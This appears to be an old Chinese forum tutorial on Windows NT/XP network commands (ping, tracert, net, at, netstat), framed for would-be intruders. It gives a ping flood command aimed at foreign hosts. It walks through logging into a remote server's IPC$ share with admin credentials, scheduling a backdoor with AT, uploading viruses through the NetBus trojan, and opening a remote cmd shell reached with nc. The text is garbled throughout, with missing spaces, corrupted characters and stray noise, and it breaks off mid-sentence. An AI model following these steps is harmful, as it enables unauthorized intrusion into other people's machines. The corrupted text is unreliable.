XP命令提示符詳解及IP查詢

XP命令提示符詳解及IP查詢長，但對(duì)網(wǎng)絡(luò)安全的興趣卻日益高漲，但經(jīng)過一段時(shí)間以來對(duì)國內(nèi)黑客站點(diǎn)的瀏覽以及部份BBS、留言版上的有關(guān)資訊，我發(fā)現(xiàn)國內(nèi)很多新手似乎對(duì)網(wǎng)上零星散見的黑客軟件極感興趣，而不重視相關(guān)系統(tǒng)知識(shí)的積累，我覺得這是一個(gè)不好的趨向，所以呢，在這兒把自己相當(dāng)淺薄的一些經(jīng)驗(yàn)寫出來，希望能夠起到拋磚引玉的作用。今天說些什么好呢,對(duì)了，再說兩句廢話吧，“工欲善其事，必先利其器”--當(dāng)然不是讓你再滿世界去找新的黑客軟件啦（其實(shí)我不反對(duì)使用這些軟件，相反我很喜歡用它們，但是必須是在知其所以然的情況下使用，才有可能對(duì)自身的電腦水平有所幫助），要進(jìn)行入侵工作的話，至少（我認(rèn)為）得裝上NT操作系統(tǒng)，以它作為入侵平臺(tái)，因?yàn)镹T本身對(duì)網(wǎng)絡(luò)的支持可以說比WIN9X來得更強(qiáng)大得多……當(dāng)然，如果想對(duì)UNIX系統(tǒng)動(dòng)點(diǎn)小手術(shù)（網(wǎng)絡(luò)中的UNIX可始終還是主流呀）而又沒錢裝UNIX的話，LINUX也極佳的選擇（特別是現(xiàn)在國內(nèi)至少有七八種中文LINUX版本一想當(dāng)年要給REDHAT配上中文支持是何等麻煩……），至少你可以借此了解UNIX系統(tǒng)的基本操作以及文件存放位置、系統(tǒng)配置、編譯器、各種動(dòng)作之后的記錄等字串4然后還得再學(xué)點(diǎn)編程語言，至少C與UNIX下的SHELL編程得會(huì)一點(diǎn)，能看懂人家寫的利用各種漏洞的程序，能對(duì)它進(jìn)行修改，偶爾還能寫幾個(gè)小程序放到網(wǎng)上讓大伙兒樂樂，這樣玩起來才可能有成就感（其實(shí)我自己還不太行，但這多少是個(gè)目標(biāo)）好了，廢話少說，先講講一些M$系統(tǒng)里自帶的相關(guān)網(wǎng)絡(luò)程序的使用吧。在忖$的操作系統(tǒng)中，與網(wǎng)絡(luò)安全較有關(guān)系的幾個(gè)命令/程序是:pingwinipcfgtracertnetatnetstat,且待我慢慢道來：ping:這是TCP/IP協(xié)議中最有用的命令之一它給另一個(gè)系統(tǒng)發(fā)送一系列的數(shù)據(jù)包，該系統(tǒng)本身又發(fā)回一個(gè)響應(yīng)，這條實(shí)用程序?qū)Σ檎疫h(yuǎn)程主機(jī)很有用，它返回的結(jié)果表示是否能到達(dá)主機(jī)，宿主機(jī)發(fā)送一個(gè)返回?cái)?shù)據(jù)包需要多長時(shí)間。Usage:ping[-t][-a][-ncount][-lsize][-f][-iTTL][-vTOS][-rcount][-scount][[-jhost-list][-khost-list]][-wtimeout]destination-listOptions:tPingtheSpecifedhostuntilinterrupted.（除非人為中止，否則一直Ping下去）aResolveaddressestohostnames.（把IP轉(zhuǎn)為主機(jī)名）ncountNumberofechorequeststosend.（響應(yīng)請求的數(shù)量）sizeSendbuffersize.（封包的大?。┳执?fSetDon'tFragmentflaginPaCket.（信息包中無碎片）iTTLTimeToLive.（時(shí)間）vTOSTypeOfSerViCe.（服務(wù)類型）rcountRecordrouteforcounthops.-scountTimestampforcounthops.jhost-listLoosesourceroutealonghost-list.-khost-listStrictsourceroutealonghost-list.（較嚴(yán)格的唉，怎么譯好算了，放著吧）-wtimeoutTimeoutinmillisecondstowaitforeachreply.（timeout的時(shí)間）比如大家可能都知道的一個(gè)命令#ping-f-s65000***.***.***.***或者前階段大家所謂Ping死霉國佬時(shí)所用的命令（當(dāng)然這樣只會(huì)造成我方自己的網(wǎng)絡(luò)阻塞）。其實(shí)這個(gè)命令主要是用來看對(duì)方應(yīng)答的速度，如果怎么Ping得到的結(jié)果都是requesttimeout。那恐怕你根本就不用你去找這臺(tái)主機(jī)了，它不在你的射程之內(nèi)。winiPcfg:這是用來看自己IP位址的小工具，亞皿98自帶，NT里則網(wǎng)絡(luò)監(jiān)視器里就能看到IP了，還有個(gè)小實(shí)用程序叫……好象是叫IPCONFIG吧，沒怎么用，都快忘了……這種東東網(wǎng)上其實(shí)相當(dāng)之多，但既然“自帶”，又何須外求，何況網(wǎng)上下載的黑客的東東里有沒有特洛伊猶未可知，再說了，如果你不是在自己的“愛姬”上運(yùn)行，豈不是就沒法干活,--哈，不好意思，跑題了，但--接著跑兩句:可以把一些常用的、經(jīng)典的工具上傳到網(wǎng)上，當(dāng)作一個(gè)備份，什么時(shí)候在網(wǎng)吧、某家公司要干活的話，直接下載就是一個(gè)完整無缺的工具包了。字串4這個(gè)東東相當(dāng)簡單，直接在DOS下鍵入命令就是了，沒有什么參數(shù)。tracert:是驗(yàn)證通往遠(yuǎn)程主機(jī)路徑的實(shí)用程序用法:tracert[-d][-hmaximum_hoPs][-jhost-list][-wtimeout]target_name參數(shù):-dDonotresolveaddressestohostnames.（不將IP轉(zhuǎn)為主機(jī)名）-hmaximum_hopsMaximumnumberofhopstosearchfortarget.（最大跟蹤數(shù)量）-jhost-listLoosesourceroutealonghost-list.-wtimeoutWaittimeoutmillisecondsforeachrePly.（timeout的時(shí)間）最簡單的用法就是tracerthostname其中hostname是計(jì)算機(jī)名或你想跟蹤其路徑的計(jì)算機(jī)的IP地址。TRACERT將返回?cái)?shù)據(jù)包借以到達(dá)最終目的地的各種IP地址，你知道該怎么利用它嗎,我略為解釋一下吧:跟蹤通往30的路由，最大30:第一行:*&八%&*我就是從這里出去的（呵，真不想說八&八）第四行:是不是快要出國了呢,第九行:呀?這是日本鬼子的地盤……net：這可是個(gè)非常棒的東西，如果不會(huì)用的話，趕緊睜大眼睛噢這個(gè)命令的語法是:可用的命令包括:NETACCOUNTSNETHELPNETSHARENETCOMPUTERNETHELPMSGNETSTART字串1NETCONFIGNETLOCALGROUPNETSTATISTICSNETCONFIGSERVERNETNAMENETSTOPNETCONFIGWORKSTATIONNETPAUSENETTIMENETCONTINUENETPRINTNETUSENETFILENETSENDNETUSERNETGROUPNETSESSIONNETVIEWNETHELPSERVICES列出用戶可以啟動(dòng)的網(wǎng)絡(luò)服務(wù)。NETHELPSYNTAX解釋如何閱讀NETHELP語法行。NETHELPcommandMORE用于逐屏顯示幫助。我可就不逐樣解釋了--這樣會(huì)把我的手指累壞，就說說常用的兩個(gè)命令吧view這個(gè)命令的語法是：NETVIEW[?computername/DOMAIN[:domainname]]NETVIEW/NETWORK:NW[\computername]NETVIEW用于顯示一個(gè)計(jì)算機(jī)上共享資源的列表。當(dāng)不帶選項(xiàng)使用本命令時(shí)，它就會(huì)顯示當(dāng)前域或網(wǎng)絡(luò)上的計(jì)算機(jī)上的列表。\computername指用戶希望瀏覽其共享資源的計(jì)算機(jī)。/DOMAIN:domainname指定用戶希望瀏覽有效的計(jì)算機(jī)所在的域。如果省略了域名，就會(huì)顯示局域網(wǎng)絡(luò)上的所有域。/NETWORK:NW顯示NetWare網(wǎng)絡(luò)上所有可用的服務(wù)器。如果指定了一個(gè)計(jì)算機(jī)名，就會(huì)顯示NetWare網(wǎng)絡(luò)中那個(gè)計(jì)算機(jī)上的可用資源。至于舉例嘛，比如你知道一個(gè)遠(yuǎn)程計(jì)算機(jī)***.***.**.***上有開資源共享，那么運(yùn)行字串6netview\***.***.**.***就可以了use這個(gè)命令的語法是:NETUSE[devicename*][\computernamesharename[volume][password*]][/USER:[domainname]username][[/DELETE][/PERSISTENT:{YESNO}]]NETUSE[devicename*][password*]][/HOME]NETUSE[/PERSISTENT:{YESNO}]NETUSE用于將計(jì)算機(jī)與共享的資源相連接，或者切斷計(jì)算機(jī)與共享資源的連接。當(dāng)不帶選項(xiàng)使用本命令時(shí)，它會(huì)列出計(jì)算機(jī)的連接。devicename指定一個(gè)名字以便與資源相連接，或者指定要切斷的設(shè)備。有兩種類型的設(shè)備名：磁盤驅(qū)動(dòng)器(D:至Z:)和打印機(jī)(LPT1:至LPT3:)。輸入一個(gè)星號(hào)來代替一個(gè)指定的設(shè)備名可以分配下一個(gè)可用設(shè)備名。\computername指控制共享資源的計(jì)算機(jī)的名字。如果計(jì)算機(jī)名中包含有空字符，就要將雙反斜線(\)和計(jì)算機(jī)名一起用引號(hào)("")括起來。計(jì)算機(jī)名可以有1到15個(gè)字符。sharename指共享資源的網(wǎng)絡(luò)名字。volume指定一個(gè)服務(wù)器上的NetWare卷。用戶必須安裝Netware的客戶服務(wù)（WindowsNT工作站）或者Netware的網(wǎng)關(guān)服務(wù)（WindowsNT服務(wù)器）并使之與NetWare服務(wù)器相連。字串4password指訪問共享資源所需要的密碼。*進(jìn)行密碼提示。當(dāng)在密碼提示符下輸入密碼時(shí)，密碼是不會(huì)顯示的。/USER指定連接時(shí)的一個(gè)不同的用戶名。domainname指定另外一個(gè)域。如果缺省域，就會(huì)使用當(dāng)前登錄的域。username指定登錄的用戶名。/HOME將用戶與他們的宿主目錄相連。/DELETE取消一個(gè)網(wǎng)絡(luò)連接，并且從永久連接列表中刪除該連接。/PERSISTENT控制對(duì)永久網(wǎng)絡(luò)連接的使用。其缺省值是最近使用的設(shè)置。YES在連接產(chǎn)生時(shí)保存它們，并在下次登錄時(shí)恢復(fù)它們。NO不保存正在產(chǎn)生的連接或后續(xù)的連接;現(xiàn)有的連接將在下次登錄時(shí)被恢復(fù)?？梢允褂?DELETE選項(xiàng)開關(guān)來刪除永久連接。PS:前兩天在綠色兵團(tuán)的貼子里見到一位仁兄的話，與這個(gè)命令有異曲共工之妙，也說明一個(gè)大概:在瀏覽器中輸入file:///\***.***.**.***c$則網(wǎng)上共享的C盤內(nèi)容就會(huì)顯示出來了，就仿佛用瀏覽器上FTP站點(diǎn)看到的一樣。各位不妨試試，還可試試舉一反三……5.at:排定在特定的日期和時(shí)間運(yùn)行某些命令和程序。運(yùn)行AT命令之前必須先啟動(dòng)Schedule服務(wù)。瞧，現(xiàn)炒就得現(xiàn)賣，剛學(xué)了net命令，但這個(gè)Start命令我可沒詳述，自己看看幫助文件，摸索一下各種命令的用法吧。字串3C:>netstartscheduleSchedule正在啟動(dòng)服務(wù) Schedulw服務(wù)啟動(dòng)成功。AT[\computername][[id][/DELETE]/DELETE[/YES]]AT[\computername]time[/INTERACTIVE][/EVERY:date[,...]/NEXT:date[,...]]"command"\computername指定遠(yuǎn)程計(jì)算機(jī)。如果省略這個(gè)參數(shù)命令會(huì)被排定在本機(jī)上運(yùn)行。id指定給排定進(jìn)度命令的識(shí)別號(hào)。/delete刪除某個(gè)已排定進(jìn)度的命令。如果省略標(biāo)識(shí)，計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除。/yes用于刪除所有作業(yè)，且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息。time指定命令運(yùn)行的時(shí)間。/interactive允許作業(yè)在運(yùn)行時(shí)，與用戶通過桌面交互。/every:date[,...]指定在每周或每月的某日（或某幾日）運(yùn)行命令。如果省略日期，則默認(rèn)為在每月的本日運(yùn)行。/next:date[,...]指定在下一個(gè)指定日期（如，下周三），運(yùn)行命令。如果省略日期，則默認(rèn)為在每月的本日運(yùn)行。"command"準(zhǔn)備運(yùn)行的WindowsNT命令或批處理文件。知道了如何使用AT,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:利用管理員登陸到目的服務(wù)器，方法為:netuse\x.x.x.xipc$“adminpwd"/user:"adminuser”（這里具體方法可參見KILLUSA的文章《HOWTOGETINNT》）利用ntsrv.exe啟動(dòng)遠(yuǎn)程：netsvc?x.x.x.xschedule/start3利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行，當(dāng)然最快運(yùn)行最理想，所以，你可以用letmein.exe得到服務(wù)器的時(shí)間，然后：at\x.x.x.x00:00ntsrv.exe/port:64321其中00:00要改為用letmein.exe得回來的具體時(shí)間+一點(diǎn)容量，等一會(huì)后，再在本地啟動(dòng)口0計(jì)口$.0*0,鍵入目的服務(wù)器得ip地址或hostname，連接?比如第一種方法，你想要在目的服務(wù)器運(yùn)行諸如病毒之類的東東，可以利用netbus得上傳功能，將各種“大補(bǔ)丸”上傳至目的服務(wù)器，再用netbus的〃StartProgram〃，鍵入完整路徑，就。卜了?第二種方法是利用netbus的“Appredirect”功能，啟動(dòng)遠(yuǎn)程telnet服務(wù)，如下：在netbus中擊“Appredirect"，鍵入"C:>winntsystem32cmd.exe",Port為：4321,服務(wù)就啟動(dòng)了，然后在本地運(yùn)行：ncx.x.x.x4321,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功：Microsoft(R)WindowsNT(TM)(C)Copyright1985-1996MicrosoftCorp.C：>注:這里有一小段是抄KILLUSA的文章一別找我要稿費(fèi)啊八&八6.netstat這是一個(gè)觀察網(wǎng)絡(luò)連接狀態(tài)的實(shí)用工具。它能檢驗(yàn)IP的當(dāng)前連接狀態(tài)，在斷定你的基本級(jí)通信正在進(jìn)行后，就要驗(yàn)證系統(tǒng)上的服務(wù)。這個(gè)服務(wù)包括檢查正在收聽輸入的通信量和/或驗(yàn)證你正在創(chuàng)建一個(gè)與遠(yuǎn)程站點(diǎn)的會(huì)話，它可以很輕松地做到這一點(diǎn)。網(wǎng)上也可以看到很多如X-netstat之類的工具，是WIN界面的，更加直觀而已，并沒有多什么功能，這個(gè)命令的具體用法如下：字串2DisplaysprotocolstatisticsandcurrentTCP/IPnetworkconnections.(顯示協(xié)議與當(dāng)前網(wǎng)絡(luò)連接)NETSTAT[-a][-e][-n][-s][-pproto][-r][interval]aDisplaysallconnectionsandlisteningports.（顯示所有連接和監(jiān)聽端口）eDisplaysEthernetstatistics.Thismaybecombinedwiththe-soption.（顯示以太連接，可以與-S連用）nDisplaysaddressesandportnumbersinnumericalform.（顯示地址和端口）pprotoShowsconnectionsfortheprotocolspecifiedbyproto;protomaybeTCPorUDP.Ifusedwiththe-soptiontodisplayper-protocolstatis